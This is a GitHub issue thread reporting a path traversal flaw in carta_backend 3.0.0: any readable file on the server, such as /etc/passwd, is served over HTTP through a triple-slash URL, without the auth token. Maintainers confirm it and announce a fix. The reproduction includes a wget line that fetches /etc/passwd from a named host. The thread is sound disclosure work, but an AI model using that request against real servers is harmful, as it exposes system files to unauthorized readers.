### ISSUE TITLE
carta_backend will serve any file on the filesystem via http://host///path, ignoring (lack of) auth token

### ISSUE THREAD

**Issue by o-smirnov** [CARTAvis/carta-backend#1242]
**Describe the bug**

Our IT dept picked this up in a security scan -- ``carta_backend`` appears to happily serve (over HTTP) any file on the server filesystem it can read (e.g. /etc/passwd) , which is a major security hole.

**To Reproduce**

```
oms@simon:~$ export CARTA_AUTH_TOKEN=98234ff8-cac2-48bb-aad8-862fd4cea128
oms@simon:~$ /usr/bin/carta_backend --port=1037 --no_browser --top_level_folder=/home/oms --frontend_folder=/usr/share/carta/frontend 
[2023-03-01 12:48:59.645] [CARTA] [info] Writing to the log file: /home/oms/.carta/log/carta.log
[2023-03-01 12:48:59.645] [CARTA] [info] /usr/bin/carta_backend: Version 3.0.0
[2023-03-01 12:48:59.645] [CARTA] [info] Serving CARTA frontend from /usr/share/carta/frontend
[2023-03-01 12:48:59.645] [CARTA] [info] Listening on port 1037 with top level folder /home/oms, starting folder /home/oms. The number of OpenMP worker threads will be handled automatically.
[2023-03-01 12:48:59.645] [CARTA] [info] CARTA is accessible at http://localhost:1037/?token=98234ff8-cac2-48bb-aad8-862fd4cea128
```
and then on another machine:
```
$ wget http://simon.ru.ac.za:1037///etc/passwd
--2023-03-01 14:53:07--  http://simon.ru.ac.za:1037///etc/passwd
Resolving simon.ru.ac.za (simon.ru.ac.za)... 146.231.135.151
Connecting to simon.ru.ac.za (simon.ru.ac.za)|146.231.135.151|:1037... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified
Saving to: ‘passwd’

passwd                                                   [ <=>                                                                                                                 ]  10.60K  --.-KB/s    in 0s      

2023-03-01 14:53:07 (105 MB/s) - ‘passwd’ saved [10854]

oms@jake:~$ 
```

**Platform info (please complete the following information):**

Ubuntu 20.04,

```
ii  carta-backend                             3.0.0-1~focal1                    amd64        CARTA - Cube Analysis and Rendering Tool for Astronomy
```

**Comment by kswang1029** [comment]
confirmed the issue with our servers. basically the port is open so naughty people can wget something through that port.

**Comment by kswang1029** [comment]
additional info: if the file being wgot is not readable, carta_backend will crash.

**Comment by veggiesaurus** [comment]
@o-smirnov thank you for picking this up. I agree that this is a major security flaw for those running CARTA on a publicly accessible location and serving the frontend via the backend (rather than using nginx to serve the frontend or using the carta controller). I've fixed the bug in #1243 and we will backport it to v3.0 as soon as it's been tested
